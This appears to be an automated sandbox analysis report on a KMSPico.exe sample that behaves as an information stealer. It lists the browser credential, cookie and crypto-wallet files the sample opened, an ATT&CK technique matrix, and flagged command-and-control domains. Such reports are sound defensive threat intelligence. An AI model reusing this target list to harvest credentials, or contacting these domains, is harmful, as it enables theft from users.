            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\Application Data\Mozilla\FirefoxJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\MANIFEST-000001Jump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\CURRENTJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOGJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldbJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\DefaultJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEHJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeDirectory queried: C:\Users\user\Documents\SNIPGPPREPJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeDirectory queried: C:\Users\user\Documents\SQSJKEBWDTJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeDirectory queried: C:\Users\user\Documents\TQDFJHPUIUJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEHJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeDirectory queried: C:\Users\user\Documents\TQDFJHPUIUJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeDirectory queried: C:\Users\user\Documents\UNKRLCVOHVJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEHJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeDirectory queried: C:\Users\user\Documents\TQDFJHPUIUJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeDirectory queried: C:\Users\user\Documents\SQSJKEBWDTJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
            Source: C:\Users\user\Desktop\KMSPico.exeDirectory queried: C:\Users\user\Documents\UNKRLCVOHVJump to behavior
            Source: Yara matchFile source: 00000000.00000003.2120848837.0000000002593000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: KMSPico.exe PID: 3648, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: Process Memory Space: KMSPico.exe PID: 3648, type: MEMORYSTR
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Windows Management Instrumentation
            1
            DLL Side-Loading
            1
            Process Injection
            11
            Virtualization/Sandbox Evasion
            1
            OS Credential Dumping
            121
            Security Software Discovery
            Remote Services1
            Archive Collected Data
            11
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            PowerShell
            Boot or Logon Initialization Scripts1
            DLL Side-Loading
            1
            Process Injection
            LSASS Memory11
            Virtualization/Sandbox Evasion
            Remote Desktop Protocol31
            Data from Local System
            2
            Non-Application Layer Protocol
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
            Deobfuscate/Decode Files or Information
            Security Account Manager1
            Process Discovery
            SMB/Windows Admin SharesData from Network Shared Drive113
            Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Obfuscated Files or Information
            NTDS1
            File and Directory Discovery
            Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script22
            Software Packing
            LSA Secrets12
            System Information Discovery
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading
            Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1400640 Sample: KMSPico.exe Startdate: 29/02/2024 Architecture: WINDOWS Score: 100 13 technologyenterdo.shop 2->13 15 problemregardybuiwo.fun 2->15 19 Snort IDS alert for network traffic 2->19 21 Multi AV Scanner detection for domain / URL 2->21 23 Found malware configuration 2->23 25 7 other signatures 2->25 7 KMSPico.exe 2->7         started        signatures3 process4 dnsIp5 17 technologyenterdo.shop 104.21.80.118, 443, 49704, 49705 CLOUDFLARENETUS United States 7->17 27 Detected unpacking (changes PE section rights) 7->27 29 Detected unpacking (overwrites its own PE header) 7->29 31 Query firmware table information (likely to detect VMs) 7->31 33 4 other signatures 7->33 11 WerFault.exe 19 16 7->11         started        signatures6 process7

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            KMSPico.exe37%ReversingLabsWin32.Trojan.CrypterX
            KMSPico.exe46%VirustotalBrowse
            KMSPico.exe100%AviraHEUR/AGEN.1352498
            KMSPico.exe100%Joe Sandbox ML
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            technologyenterdo.shop16%VirustotalBrowse
            problemregardybuiwo.fun18%VirustotalBrowse
            SourceDetectionScannerLabelLink
            http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
            http://x1.c.lencr.org/00%URL Reputationsafe
            http://x1.i.lencr.org/00%URL Reputationsafe
            http://crt.rootca1.amazontrust.com/rootca1.cer0?0%URL Reputationsafe
            https://technologyenterdo.shop/&0%Avira URL Cloudsafe
            technologyenterdo.shop0%Avira URL Cloudsafe
            https://technologyenterdo.shop/apie0%Avira URL Cloudsafe
            problemregardybuiwo.fun18%VirustotalBrowse
            https://technologyenterdo.shop/apie0%VirustotalBrowse
            pooreveningfuseor.pw0%Avira URL Cloudsafe
            problemregardybuiwo.fun100%Avira URL Cloudmalware
            pooreveningfuseor.pw14%VirustotalBrowse
            associationokeo.shop100%Avira URL Cloudmalware
            https://technologyenterdo.shop/10%Avira URL Cloudsafe
            turkeyunlikelyofw.shop100%Avira URL Cloudmalware
            http://ocsp.rootca1.amazontrust.com0:0%Avira URL Cloudsafe
            technologyenterdo.shop16%VirustotalBrowse
            detectordiscusser.shop0%Avira URL Cloudsafe
            turkeyunlikelyofw.shop20%VirustotalBrowse
            https://technologyenterdo.shop/J0%Avira URL Cloudsafe
            associationokeo.shop20%VirustotalBrowse
            https://technologyenterdo.shop/apis0%Avira URL Cloudsafe
            https://technologyenterdo.shop/y0%Avira URL Cloudsafe
            https://technologyenterdo.shop/api100%Avira URL Cloudmalware
            https://technologyenterdo.shop/0%Avira URL Cloudsafe
            detectordiscusser.shop19%VirustotalBrowse
            https://technologyenterdo.shop/15%VirustotalBrowse
            https://technologyenterdo.shop/?0%Avira URL Cloudsafe
            https://technologyenterdo.shop/y15%VirustotalBrowse
            https://technologyenterdo.shop/apik40%Avira URL Cloudsafe
            https://technologyenterdo.shop/api19%VirustotalBrowse
            https://technologyenterdo.shop/apis14%VirustotalBrowse

            Download Network PCAP: filteredfull

            NameIPActiveMaliciousAntivirus DetectionReputation
            technologyenterdo.shop
            104.21.80.118
            truetrueunknown
            problemregardybuiwo.fun
            unknown
            unknowntrueunknown
            NameMaliciousAntivirus DetectionReputation
            problemregardybuiwo.funtrue
            • 18%, Virustotal, Browse
            • Avira URL Cloud: malware
            unknown
            technologyenterdo.shoptrue
            • 16%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            pooreveningfuseor.pwtrue
            • 14%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            associationokeo.shoptrue
            • 20%, Virustotal, Browse
            • Avira URL Cloud: malware
            unknown
            turkeyunlikelyofw.shoptrue
            • 20%, Virustotal, Browse
            • Avira URL Cloud: malware
            unknown
            detectordiscusser.shoptrue
            • 19%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://technologyenterdo.shop/apitrue
            • 19%, Virustotal, Browse
            • Avira URL Cloud: malware
            unknown
            NameSourceMaliciousAntivirus DetectionReputation
            https://duckduckgo.com/chrome_newtabKMSPico.exe, 00000000.00000003.2036010212.0000000004B39000.00000004.00000800.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2036088652.0000000004B36000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              https://technologyenterdo.shop/apieKMSPico.exe, 00000000.00000003.2034989504.0000000002593000.00000004.00000020.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              https://duckduckgo.com/ac/?q=KMSPico.exe, 00000000.00000003.2036010212.0000000004B39000.00000004.00000800.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2036088652.0000000004B36000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                https://technologyenterdo.shop/&KMSPico.exe, 00000000.00000003.2066524885.0000000002604000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2063814248.0000000002602000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://www.google.com/images/branding/product/ico/googleg_lodp.icoKMSPico.exe, 00000000.00000003.2036010212.0000000004B39000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  https://technologyenterdo.shop/1KMSPico.exe, 00000000.00000003.2034989504.0000000002593000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=KMSPico.exe, 00000000.00000003.2036010212.0000000004B39000.00000004.00000800.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2036088652.0000000004B36000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
